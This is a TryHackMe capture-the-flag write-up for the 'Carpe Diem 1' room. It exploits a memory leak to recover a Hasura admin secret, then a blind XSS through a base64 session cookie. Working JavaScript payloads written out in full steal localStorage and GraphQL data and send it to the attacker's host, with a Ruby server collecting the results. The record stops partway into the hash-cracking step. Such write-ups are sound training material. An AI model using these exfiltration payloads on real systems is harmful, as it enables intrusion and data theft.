Carpe Diem 1 - (salty) Write-up - TryHackMe

Information

Room#

  • Name: Carpe Diem 1
  • Profile: tryhackme.com
  • Difficulty: Hard
  • Description: Recover your clients encrypted files before the ransomware timer runs out!

Carpe Diem 1

Write-up

Overview#

Install tools used in this WU on BlackArch Linux:

1
$ sudo pacman -S nmap ctf-party haiti john keepassxc

Network enumeration#

Port and service port scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Nmap 7.93 scan initiated Mon Feb 13 22:42:21 2023 as: nmap -sSVC -T4 -p- -v --open --reason -oA nmap 10.10.121.247
Nmap scan report for 10.10.121.247
Host is up, received echo-reply ttl 63 (0.032s latency).
Not shown: 65377 closed tcp ports (reset), 155 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 nginx 1.6.2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home
|_http-server-header: nginx/1.6.2
111/tcp open rpcbind syn-ack ttl 63 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33386/tcp6 status
| 100024 1 37481/tcp status
| 100024 1 42270/udp status
|_ 100024 1 56131/udp6 status
37481/tcp open status syn-ack ttl 63 1 (RPC #100024)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 13 22:42:47 2023 -- 1 IP address (1 host up) scanned in 26.05 seconds

Web discovery#

Let's download the file in mentioned the description.

1
$ wget http://10.10.121.247/downloads/Database.carp

The file must be a file encrypted by the ransonware.

The homepage is a classic ransonware page, there is a timer and a BTC address (bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hj).

On the source of the HTML page we can see this chunk of JavaScript code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
function aaa(wallet) {
var wallet = wallet;
if (wallet.trim() === 'bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hj'){
alert('Hey! \n\nstupid is as stupid does...');
return;
}

var re = new RegExp("^([a-z0-9]{42,42})$");
if (re.test(wallet.trim())) {
var http = new XMLHttpRequest();
var url = 'http://c4rp3d13m.net/proof/';
http.open('POST', url, true);
http.setRequestHeader('Content-type', 'application/json');
var d = '{"size":42,"proof":"'+wallet+'"}';
http.onreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
//alert(http.responseText);
}
}
http.send(d);
} else {
alert('Invalid wallet!');
}
}

Let's add the domain name in /etc/hosts.

1
2
$ grep c4rp3d13m /etc/hosts
10.10.121.247 c4rp3d13m.net

Looking at HTTP headers the application web server is Express (NodeJS) and there is a countdown cookie and the session cookie is containing our IP address encoded in base64.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ curl -I http://c4rp3d13m.net/
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 13 Feb 2023 22:02:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 3927
Connection: keep-alive
X-Powered-By: Express
Set-Cookie: session=MTAuMTguMjUuMTk5; Max-Age=900; Path=/; Expires=Mon, 13 Feb 2023 22:17:26 GMT; HttpOnly
Set-Cookie: countdown=2023-02-13T21%3A42%3A42.027897; Max-Age=900; Path=/; Expires=Mon, 13 Feb 2023 22:17:26 GMT
ETag: W/"f57-pPQq+82IGyFfhUOUJGjEW+Mr+1E"
Last-Modified: Monday, 13-Feb-2023 22:02:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0

$ ctf-party MTAuMTguMjUuMTk5 from_b64
10.18.25.199

Data leak#

Let's get back to the proof endpoint, it's expecting a 42 char long wallet address.

1
2
$ ruby -e 'puts "a"*42'
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

The request looks like that:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /proof/ HTTP/1.1
Host: c4rp3d13m.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/json
Content-Length: 64
Origin: http://c4rp3d13m.net
Connection: close
Referer: http://c4rp3d13m.net/
Cookie: session=MTAuMTguMjUuMTk5; countdown=undefined

{"size":42,"proof":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}

The answer just reflects the address.

If you put a wrong value, let's say only one char…

1
{"size":42,"proof":"a"}

… then some content is leaked…

1
2
3
4
5
atokens;
}

module.exports = split;
7mo

…the address we provided plus 41 other bytes.

Since we control the size parameter we may increase that.

Using any long size we can leak some garbage followed by this interesting content:

1
request.post({ headers: {'content-type' : 'application/json','x-hasura-admin-secret' : 's3cr3754uc35432' error connecting to http://192.168.150.10/v1/graphql/

Looks like some credentials for an internal GraphQL endpoint we can't access for now.

Searching for x-hasura-admin-secret we find https://hasura.io/blog/hasura-authentication-explained/ so the GraphQL engine is Hasura.

Blind XSS and salt#

Let's get back to the base64 encoded session cookie. Since it contains an IP address we can assume there will be some kind of SSRF.

I injected some payloads without success. At this point, I won't wanna lie, I consulted the write-up.

So you add to guess there is a blind XSS on an internal backend and that double quote are filtered.

Note : I noticed none of the third-party write-ups were explaining why they tried a blind XSS payload there or how they figured it out, so I assume they were probably blocked like my and read the author write-up.

Rather than injecting a full script, it will be more flexible to inject an entrypoint loading an external resource that we can modify at will without modifying the initial payload.

1
<script src='http://10.18.25.199:9999/noraj.js'></script>

Just base64 encode it and replace the session cookie value with ctf-party.

1
2
$ ctf-party "<script src='http://10.18.25.199:9999/noraj.js'></script>" to_b64
PHNjcmlwdCBzcmM9J2h0dHA6Ly8xMC4xOC4yNS4xOTk6OTk5OS9ub3Jhai5qcyc+PC9zY3JpcHQ+

Then start a HTTP server to serve noraj.js.

1
2
3
4
5
6
$ ruby -run -ehttpd public -p9999
[2023-02-22 23:40:14] INFO WEBrick 1.8.1
[2023-02-22 23:40:14] INFO ruby 3.0.5 (2022-11-24) [x86_64-linux]
[2023-02-22 23:40:14] INFO WEBrick::HTTPServer#start: pid=6760 port=9999
10.10.75.56 - - [22/Feb/2023:23:42:40 CET] "GET /noraj.js HTTP/1.1" 200 0
http://192.168.150.13:5000/ -> /noraj.js

Then we need a data grabber to extract valuable information.

Note : reading other write-ups I have seen everyone using some XHR. But why would you use the horrible syntax of XMLHttpRequest()? It's so old it was already supported on Chrome and Firefox version 1, yes version 1. Fortunately, anyone with a bit of client-side web knowledge knows that nowadays you can use the nicer fetch() method instead. Do you still use Internet Explorer? No? So please stop using XHR too. It's like continuing to use mono-threaded dirb in 2023 while ffuf exists…

So to (try to) steal cookies, I used this payload in noraj.js:

1
2
3
4
5
fetch('http://10.18.25.199:9999/data', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});

But fetch wouldn't work here 😡 So I have to use a XHR payload to understand why. 😡 I have my idea but I won't judge before seeing it. So here a payload to grab the user agent.

1
2
3
x = new XMLHttpRequest();
x.open("GET", "http://10.18.25.199:9999/data?ua="+window.navigator.userAgent);
x.send();
1
2
$ ctf-party 'Mozilla/5.0%20(Unknown;%20Linux%20x86_64)%20AppleWebKit/538.1%20(KHTML,%20like%20Gecko)%20PhantomJS/2.1.1%20Safari/538.1' urldecode
Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1

According to Can I use only IE would not support fetch but the machine must not be a windows server. So the other explanation is that because the driven-browser framework used for the challenge has a quite poor real browser level support. Now we have fetched the User-Agent we know the challenge app is using PhantomJS 2.1 according to https://user-agents.net/s/L2AB. But PhantomJS is terrible, deprecated and abandoned. fetch() is not part of ECMAscript (JavaScript) but of the Web platform API (defined by WHATWG and W3C) like most of the BOM (BrowserObjectModel) and PhantomJS does not supports Promise. Yet another example of poor challenge implementation which make it very far from real life. The author should have used a more robust headless browser control library like Selenium or Puppeteer. And there is no excuse, PhantomJS was already abandoned and lacking of modern features in 2020 when the room was released.

So in real life you would use fetch() but on this CTFfy challenge you are forced to use old XHR. 😡 If you can't learn new things, let's rediscover the past then.

This is the part where you are supposed to create a huge XHR requests, trying to enumerate everything, base64 encode everything, and doing it the hard way because the player is supposed to be a mid-level web hacker so doing it the hard way make you learn stuff. But what if I have already done that shit tons of time and that I bored of it? What if I'm a web expert? I'll just use a Beef hook, because in real life cybercriminals would use a beef-like C2 framework to exploit a blind XSS on a large victim range to be able to scale and automate. An auditor would do the same but to save time. So no, I refuse to do it the stupid way like the author intends.

1
2
$ ctf-party "<script src='http://10.18.25.199:3000/hook.js'></script>" to_b64
PHNjcmlwdCBzcmM9J2h0dHA6Ly8xMC4xOC4yNS4xOTk6MzAwMC9ob29rLmpzJz48L3NjcmlwdD4=

However, we still have the same issue, the deprecated PhantomJS doesn't seem to support the BeeF hook.

So let's get back to XHR…

Let's make a small web server data grabber:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
require 'agoo'

# https://rubydoc.info/gems/agoo/Agoo/Log#configure-class_method
Agoo::Log.configure(dir: '',
console: true,
classic: true,
colorize: true,
states: {
ERROR: false,
WARN: false,
INFO: false,
DEBUG: true,
connect: true,
request: true,
response: false,
eval: false,
push: false,
})

# https://rubydoc.info/gems/agoo/Agoo/Server#init-class_method
Agoo::Server.init(9999, 'public')

class DataLogger
def call(req)
[ 200, { }, [ "noraj" ] ]
end
end

handler = DataLogger.new
Agoo::Server.handle(:POST, "/data", handler)
Agoo::Server.handle(:OPTIONS, "/data", handler)
Agoo::Server.start()

With PhantomJS the post doesn't work…

1
2
3
4
var x = new XMLHttpRequest();
x.open("POST", "http://10.18.25.199:9999/data");
x.setRequestHeader('Content-Type', 'application/json');
x.send(JSON.stringify(localStorage));

With PhantomJS the string interpolation syntax doesn't work…

1
2
3
4
var xhr=new XMLHttpRequest();
var data = JSON.stringify(localStorage);
xhr.open("GET", `http://10.18.25.199:9999/?q=${data}`);
xhr.send();

With PhantomJS string concatenation… works!

1
2
3
4
var xhr=new XMLHttpRequest();
var data = JSON.stringify(localStorage);
xhr.open("GET", "http://10.18.25.199:9999/?q=" + data);
xhr.send();

We can decode the received request URL with ctf-party:

1
2
$ ctf-party '/?q=%7B%22secret%22:%22s3cr3754uc35432%22,%22flag1%22:%22THM%EDITED%7D%22%7D' urldecode
/?q={"secret":"s3cr3754uc35432","flag1":"THM{EDITED}"}

Blind XSS, GraphQL and more salt#

From the data leak we had earlier, we know a Hasura GraphQL endpoint and the associated admin credentials.

So first I retried [GraphQL Voyager] introspection query, and then I minified it with a CodePen snippet.

Resulting in:

1
query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}

Then we can send the introspection query as an admin, retrieve the result, base64 it and exfiltrate it to our server:

1
2
3
4
5
6
7
8
9
10
11
12
var xhr=new XMLHttpRequest();
var data = '{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}';
xhr.open("POST", "http://192.168.150.10:8080/v1/graphql/", true);
xhr.setRequestHeader('x-hasura-admin-secret', 's3cr3754uc35432');
xhr.onreadystatechange = function() {
if (xhr.readyState === 4 && xhr.status === 200) {
var exfil = new XMLHttpRequest();
exfil.open('GET','http://10.18.25.199:9999/data?q='+btoa(xhr.responseText),false);
exfil.send();
}
}
xhr.send(data);

The Hasura endpoint seems to not support the introspection query from GraphQL voyager (or the minifying goes wrong) but testing for something minimal like {__schema{types{name}}} works.

Pseudo minifying manually just remove newline didn't work either. And replacing newlines with \n didn't either. So let's try another introspection query on PATT. Whatever I do it seems not to work

For some obscure reasons not even explained on the author write-ups, the cookie can't contain double quotes. But it seems to be the case SOMETIMES for the script content as well. Many previous XHRs were containing double quotes and working but it seems nobody managed to pass the GraphQL part without encoding the JS payload to base64. Nobody seems to know what they are doing and just recopy the author payload so since it's unrealistic and obscure let's just do that as well, at this point I just want to end that shit.

Valid GraphQL queries are not returning to us because the GET query get too big.

1
2
3
4
# agoo
D 2023/02/25 22:19:59.104263175 DEBUG: HTTP response on 369: HTTP/1.1 431 Request Header Fields Too Large
# webrick
[2023-02-25 22:27:08] ERROR WEBrick::HTTPStatus::RequestURITooLarge

That's why I wanted to use POST in the first place but for it works only on the same host due to CORS so we are forced to use GET for exfiltration.

I assume we could split the answer in many parts and send dozens of GET queries to retrieve a full introspection but that would be an unnecessary pain for a poorly written challenge.

This payloads works and doesn't need encoding despite the double quotes.

1
2
3
4
5
6
7
8
9
10
11
12
var xhr = new XMLHttpRequest();
var data = '{"query":"{__schema{types{name}}}"}';
xhr.open("POST", "http://192.168.150.10:8080/v1/graphql/", true);
xhr.setRequestHeader('x-hasura-admin-secret', 's3cr3754uc35432');
xhr.onreadystatechange = function() {
if (xhr.readyState === 4 /*&& xhr.status === 200*/) {
var exfil = new XMLHttpRequest();
exfil.open('GET','http://10.18.25.199:9999/data?grapql=' + btoa(xhr.responseText) + '&httpcode=' + xhr.status, false);
exfil.send();
}
}
xhr.send(data);
1
10.10.113.20 - - [25/Feb/2023 22:49:37] "GET /data?grapql=eyJkYXRhIjp7Il9fc2NoZW1hIjp7InR5cGVzIjpbeyJuYW1lIjoiQm9vbGVhbiJ9LHsibmFtZSI6IkZsb2F0In0seyJuYW1lIjoiSUQifSx7Im5hbWUiOiJJbnQifSx7Im5hbWUiOiJJbnRfY29tcGFyaXNvbl9leHAifSx7Im5hbWUiOiJTdHJpbmcifSx7Im5hbWUiOiJTdHJpbmdfY29tcGFyaXNvbl9leHAifSx7Im5hbWUiOiJfX0RpcmVjdGl2ZSJ9LHsibmFtZSI6Il9fRGlyZWN0aXZlTG9jYXRpb24ifSx7Im5hbWUiOiJfX0VudW1WYWx1ZSJ9LHsibmFtZSI6Il9fRmllbGQifSx7Im5hbWUiOiJfX0lucHV0VmFsdWUifSx7Im5hbWUiOiJfX1NjaGVtYSJ9LHsibmFtZSI6Il9fVHlwZSJ9LHsibmFtZSI6Il9fVHlwZUtpbmQifSx7Im5hbWUiOiJjb25mbGljdF9hY3Rpb24ifSx7Im5hbWUiOiJtdXRhdGlvbl9yb290In0seyJuYW1lIjoib3JkZXJfYnkifSx7Im5hbWUiOiJxdWVyeV9yb290In0seyJuYW1lIjoic3Vic2NyaXB0aW9uX3Jvb3QifSx7Im5hbWUiOiJ0aW1lc3RhbXAifSx7Im5hbWUiOiJ0aW1lc3RhbXBfY29tcGFyaXNvbl9leHAifSx7Im5hbWUiOiJ2aWN0aW1zIn0seyJuYW1lIjoidmljdGltc19hZ2dyZWdhdGUifSx7Im5hbWUiOiJ2aWN0aW1zX2FnZ3JlZ2F0ZV9maWVsZHMifSx7Im5hbWUiOiJ2aWN0aW1zX2FnZ3JlZ2F0ZV9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfYXJyX3JlbF9pbnNlcnRfaW5wdXQifSx7Im5hbWUiOiJ2aWN0aW1zX2F2Z19maWVsZHMifSx7Im5hbWUiOiJ2aWN0aW1zX2F2Z19vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfYm9vbF9leHAifSx7Im5hbWUiOiJ2aWN0aW1zX2NvbnN0cmFpbnQifSx7Im5hbWUiOiJ2aWN0aW1zX2luY19pbnB1dCJ9LHsibmFtZSI6InZpY3RpbXNfaW5zZXJ0X2lucHV0In0seyJuYW1lIjoidmljdGltc19tYXhfZmllbGRzIn0seyJuYW1lIjoidmljdGltc19tYXhfb3JkZXJfYnkifSx7Im5hbWUiOiJ2aWN0aW1zX21pbl9maWVsZHMifSx7Im5hbWUiOiJ2aWN0aW1zX21pbl9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfbXV0YXRpb25fcmVzcG9uc2UifSx7Im5hbWUiOiJ2aWN0aW1zX29ial9yZWxfaW5zZXJ0X2lucHV0In0seyJuYW1lIjoidmljdGltc19vbl9jb25mbGljdCJ9LHsibmFtZSI6InZpY3RpbXNfb3JkZXJfYnkifSx7Im5hbWUiOiJ2aWN0aW1zX3NlbGVjdF9jb2x1bW4ifSx7Im5hbWUiOiJ2aWN0aW1zX3NldF9pbnB1dCJ9LHsibmFtZSI6InZpY3RpbXNfc3RkZGV2X2ZpZWxkcyJ9LHsibmFtZSI6InZpY3RpbXNfc3RkZGV2X29yZGVyX2J5In0seyJuYW1lIjoidmljdGltc19zdGRkZXZfcG9wX2ZpZWxkcyJ9LHsibmFtZSI6InZpY3RpbXNfc3RkZGV2X3BvcF9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfc3RkZGV2X3NhbXBfZmllbGRzIn0seyJuYW1lIjoidmljdGltc19zdGRkZXZfc2FtcF9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfc3VtX2ZpZWxkcyJ9LHsibmFtZSI6InZpY3RpbXNfc3VtX29yZGVyX2J5In0seyJuYW1lIjoidmljdGltc191cGRhdGVfY29sdW1uIn0seyJuYW1lIjoidmljdGltc192YXJfcG9wX2ZpZWxkcyJ9LHsibmFtZSI6InZpY3RpbXNfdmFyX3BvcF9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfdmFyX3NhbXBfZmllbGRzIn0seyJuYW1lIjoidmljdGltc192YXJfc2FtcF9vcmRlcl9ieSJ9LHsibmFtZSI6InZpY3RpbXNfdmFyaWFuY2VfZmllbGRzIn0seyJuYW1lIjoidmljdGltc192YXJpYW5jZV9vcmRlcl9ieSJ9XX19fQ==&httpcode=200 HTTP/1.1" 404 -

Decoded data:

1
{"data":{"__schema":{"types":[{"name":"Boolean"},{"name":"Float"},{"name":"ID"},{"name":"Int"},{"name":"Int_comparison_exp"},{"name":"String"},{"name":"String_comparison_exp"},{"name":"__Directive"},{"name":"__DirectiveLocation"},{"name":"__EnumValue"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"conflict_action"},{"name":"mutation_root"},{"name":"order_by"},{"name":"query_root"},{"name":"subscription_root"},{"name":"timestamp"},{"name":"timestamp_comparison_exp"},{"name":"victims"},{"name":"victims_aggregate"},{"name":"victims_aggregate_fields"},{"name":"victims_aggregate_order_by"},{"name":"victims_arr_rel_insert_input"},{"name":"victims_avg_fields"},{"name":"victims_avg_order_by"},{"name":"victims_bool_exp"},{"name":"victims_constraint"},{"name":"victims_inc_input"},{"name":"victims_insert_input"},{"name":"victims_max_fields"},{"name":"victims_max_order_by"},{"name":"victims_min_fields"},{"name":"victims_min_order_by"},{"name":"victims_mutation_response"},{"name":"victims_obj_rel_insert_input"},{"name":"victims_on_conflict"},{"name":"victims_order_by"},{"name":"victims_select_column"},{"name":"victims_set_input"},{"name":"victims_stddev_fields"},{"name":"victims_stddev_order_by"},{"name":"victims_stddev_pop_fields"},{"name":"victims_stddev_pop_order_by"},{"name":"victims_stddev_samp_fields"},{"name":"victims_stddev_samp_order_by"},{"name":"victims_sum_fields"},{"name":"victims_sum_order_by"},{"name":"victims_update_column"},{"name":"victims_var_pop_fields"},{"name":"victims_var_pop_order_by"},{"name":"victims_var_samp_fields"},{"name":"victims_var_samp_order_by"},{"name":"victims_variance_fields"},{"name":"victims_variance_order_by"}]}}}

Then your are supposed to use the PATT introspection query but whatever I'm using as web server the results is always too long except when using python -m http.server 9999 --directory public. I recopied the introspection query from the author payload because when I try to format it myself it doesn't work.

1
2
3
4
5
6
7
8
9
10
11
12
var xhr = new XMLHttpRequest();
var data = '{"query":"fragment FullType on __Type {\n kind\n name\n description\n fields(includeDeprecated: true) {\n name\n description\n args{\n ...InputValue\n }\n type {\n ...TypeRef\n }\nisDeprecated\n deprecationReason\n }\n inputFields {\n ...InputValue\n }\ninterfaces {\n ...TypeRef\n }\n enumValues(includeDeprecated: true) {\nname\n description\n isDeprecated\n deprecationReason\n }\n possibleTypes{\n ...TypeRef\n }\n}\nfragment InputValue on __InputValue {\n name\ndescription\n type {\n ...TypeRef\n }\n defaultValue\n}\nfragment TypeRef on__Type {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\nname\n ofType {\n kind\n name\n ofType {\n kind\nname\n ofType {\n kind\n name\n ofType {\nkind\n name\n ofType {\n kind\nname\n }\n }\n }\n }\n }\n }\n }\n}\n\nquery IntrospectionQuery {\n __schema {\n queryType {\n name\n }\nmutationType {\n name\n }\n types {\n ...FullType\n }\ndirectives {\n name\n description\n locations\n args{\n ...InputValue\n }\n }\n }\n}\n","variables":null,"operationName":"IntrospectionQuery"}';
xhr.open("POST", "http://192.168.150.10:8080/v1/graphql/", true);
xhr.setRequestHeader('x-hasura-admin-secret', 's3cr3754uc35432');
xhr.onreadystatechange = function() {
if (xhr.readyState === 4 /*&& xhr.status === 200*/) {
var exfil = new XMLHttpRequest();
exfil.open('GET','http://10.18.25.199:9999/data?grapql=' + btoa(xhr.responseText) + '&httpcode=' + xhr.status, false);
exfil.send();
}
}
xhr.send(data);

I won't paste the full JSON schema because it's way too long but here are some screenshots from GraphQL Voyager.

Queries:

Mutations:

When you have the full schema you are able to identify where the interesting data is stored (victims node) and to make the following query.

1
2
3
4
5
6
7
8
9
10
11
12
var xhr = new XMLHttpRequest();
var data = '{"query":"{victims {filename id key name timer}}"}';
xhr.open("POST", "http://192.168.150.10:8080/v1/graphql/", true);
xhr.setRequestHeader('x-hasura-admin-secret', 's3cr3754uc35432');
xhr.onreadystatechange = function() {
if (xhr.readyState === 4 /*&& xhr.status === 200*/) {
var exfil = new XMLHttpRequest();
exfil.open('GET','http://10.18.25.199:9999/data?grapql=' + btoa(xhr.responseText) + '&httpcode=' + xhr.status, false);
exfil.send();
}
}
xhr.send(data);

Decoded results:

1
{"data":{"victims":[{"filename":"miredo.conf","id":69,"key":"RW1Ed3ZNV09aeWFjOTdxM1B0OFQzTkNFY0JDbDNKenA1a1FfVFBfWXZ6ZVN5MnAuTkpJV1NUanRsZ0lWQVZWUg==","name":"192.168.66.12","timer":"2020-04-15T20:56:13.203303"}, {"filename":"fuse.conf","id":71,"key":"OHphWi50Umt5SEVBNGhYemlxM3hzOFZCWTN3YzFjWFVVMkQ2Z3d0NEcxRFJ6cGJWbGZYY3FSMUpLREpEYXRrdw==","name":"192.168.66.200","timer":"2020-04-15T20:57:00.398945"}, {"filename":"Photos.zip","id":49,"key":"22iAgaC6Z8BT4+YhiCBWuOLXWuc+JKmKf6XZynuCfTKD7kXuz9/mHeDE8Vvlk4Dtu0kSMHxnQ3VaUD72GzG4UA==","name":"77.154.250.54","timer":"2020-03-19T11:29:48.523753"}, {"filename":"Transfers.csv","id":42,"key":"w68C7PrR4HkCLWYpbH5tUPh4Uh3og91QUtzWD2SmnJeNGIDZZ7Lbesp6Aa9cx36vqsICnfCYT0H6Ff6SmOaI6Q==","name":"192.168.66.134","timer":"2019-04-09T10:50:37.585655"}, {"filename":"BTC-Wallet.tar","id":50,"key":"1AcXybheh5579DlQmcQq4Awlv1Qs6uZXzM+ke3po6zgz6C294iT6YJgMz9n7myd2Vf6KxS+yuZziPcICLXe75g==","name":"45.35.25.4","timer":"2020-04-12T14:30:18.766926"}, {"filename":"archive.zip","id":43,"key":"MtwC53PsMaD0TkRyCr/vYhBxEHqXict7MUoYUSux9J036ifSgXtqPdVmAIdqm7EEcov6cjicqhOom2woKKkUdQ==","name":"26.34.132.1","timer":"2019-01-11T10:50:37.617187"}, {"filename":"Books.xls","id":45,"key":"pukeL2llboQLPKlG71yEGUFiV1bmXBv6fadrhIjyDRM6bZjrFYXtFP8uN13hDq6iEDoneH8W//XIHw4/L/nc6Q==","name":"192.168.150.1","timer":"2020-04-14T10:56:35.669927"}, {"filename":"Database.kbxd","id":48,"key":"EDITED","name":"195.204.178.84","timer":"2020-04-15T14:29:24.383136"}, {"filename":"protocols.txt","id":66,"key":"bk0udDFibXEzaDZ0QjZKSGNXNVlDZEJEbGJSZ0toRkdiSkxqSlpRdER4R25wUC5yUklZazJMUi5hLm1jLkp6dg==","name":"192.168.14.45","timer":"2020-04-15T20:52:45.553107"}, {"filename":"mailcap.order","id":67,"key":"VExYcHRGTmpBc0poREcwU3F5YmNyS0VLblQuNkpBT1laQWVLd2Vwbm13Wmx6cnpxSUNSdGM2Sld2RmZoRm9Zdg==","name":"192.168.16.87","timer":"2020-04-15T20:55:03.712607"}, {"filename":"debconf.conf","id":68,"key":"ZE5qVHhoN0Zadi5kR1hjOHNFNFNFYnF6Vl9DZG9wYmliYmQ4MW1rd1RfRURvdFhhZ3pUUlhHc2tNaklRRVZGMA==","name":"195.204.167.10","timer":"2020-04-15T20:55:50.152751"}, {"filename":"wgetrc","id":75,"key":"NUJFZ0VXcjBHSUhsbVhxMFZZLmpFWFRCdmxFMHp1NkNmcmRZeDdXdUs4UXBhY1RyUGJTVDRDQ2VlbDhlWWdzNA==","name":"192.168.16.65","timer":"2020-04-16T06:43:27.536027"}, {"filename":"smartd.conf","id":83,"key":"b1N2OE45cTRfR25uQjZJREp0bTZ6c0FIWDRvZHVvbi4wT2NqejJvN0hpNWdod0Rrb2tEMkpyVTNNclBLTm9ybQ==","name":"192.168.16.53","timer":"2020-04-16T12:44:38.639593"}, {"filename":"reportbug.conf","id":85,"key":"bFNBb1BBWGV6RTRfSWVnQVVBakhtODZya1c4MWdiQjFoUElsV0UySHdZZU13cEVIOVNlZElUalZnVE96M2wwYw==","name":"192.168.225.1","timer":"2020-04-17T14:49:13.031589"}, {"filename":"vegan_secrets.txt","id":74,"key":"SFFaU0pCTXdUcDJYWlZQR29oY2ZRbkwzWk5JeTRKZXQ4MWxBTnE2ekpDVV9PM3c2SDZGeHdHRHZUSEdaWTFiRQ==","name":"192.168.66.1","timer":"2020-04-15T20:58:08.833383"}, {"filename":"modules.doc","id":70,"key":"ZzJrSU12RmdNT1ZSQjAxYmx0dWNGeHFXNVF2RW9tMEt4Q29lT2hPbWhfaHJSRHBzMWJqUVlIYUFOQkNHUWRSZg==","name":"192.168.66.111","timer":"2020-04-15T20:56:33.911143"}, {"filename":"papersize.clip","id":72,"key":"R24xR1h4aGE2aEJRVEhWRHpUdHVDU1BCLi5VdUxQQm5JZ2ZHQ0U2b0tJZzhGclhZTG53eDE3U1Eya2VKajBjMA==","name":"192.168.66.188","timer":"2020-04-15T20:57:26.348101"}, {"filename":"small_steps.rtf","id":73,"key":"dzAwNk1mR0EwY0loa2FUaVkuckgyMUxObVRONFdzWktwcDk4dVZMc1M3ZzlmUGMzaXRISktwZ1RLYUpuZVdEdg==","name":"192.168.0.12","timer":"2020-04-15T20:57:41.321097"}, {"filename":"papersize.clip","id":84,"key":"ODB2S0l3OHphNXJ0ZlpxNnFTWlNoZ3FncEFNdko4eWRRVlUyYWlTaW9sb05fVm5GeTBRNDVvS085QnFNd2drQw==","name":"192.168.16.53","timer":"2020-04-16T12:44:38.647069"}, {"filename":"my_keys.xls","id":76,"key":"dnYzcWJKcnk1aVFUQmd2Z0h5QURyUkpuSEpjOFVTOC5rVTE1MS5jZ2laZk9Yb21JaHl2VkZ3RU9NQ2NXamVLQQ==","name":"192.168.16.65","timer":"2020-04-16T06:43:27.542364"}, {"filename":"Your_shadow.docx","id":77,"key":"dklTN3VLZmd1VWFDaVZWeDlLWEtzd0gwcVg2TUVMcmNVak10bGFQdDZYZ29HMXVfci5DbHRwbkNRV0s5dGVKTg==","name":"10.212.134.200","timer":"2020-04-16T07:17:00.797966"}, {"filename":"No_secrets_here.txt","id":78,"key":"TTgwekpfQy5DbDZ1ckFjUERmRFRSUlJEeTdhdE10Z3k0cWZJeHNDbjhVWHJYNWlfLkN1WDRUakxEelJ3enN4Vg==","name":"10.212.134.200","timer":"2020-04-16T07:17:00.805219"}, {"filename":"magic.txt","id":86,"key":"TjMxN0R2YmVGdE5jR2pXaXpteE4wLl82VGdZUzVReDdEdjlvckhITThPOEpPM3NaRmdpWDV0OWZmOW5iU3JqWA==","name":"<script src='http://10.18.25.199:9999/noraj.js'></script>","timer":"2023-02-25T21:06:45.148785"}]}}

Data recovery#

The encrypted file that was given to use is Database.carp and we can notice a file named Database.kbxd among the list.

Let's try to decrypt the file. We don't know the arguments order so we have to guess or brute-force all combinations.

1
2
3
4
$ ./decrypt_linux_amd64 'EDITED' Database.carp Database.kdbx
$ chmod +r Database.kdbx.decryp
$ file Database.kdbx.decrypt
Database.kdbx.decrypt: Keepass password database 2.x KDBX

Hash cracking#

See my room on hash cracking.

  1. Extract the file hash to JtR format
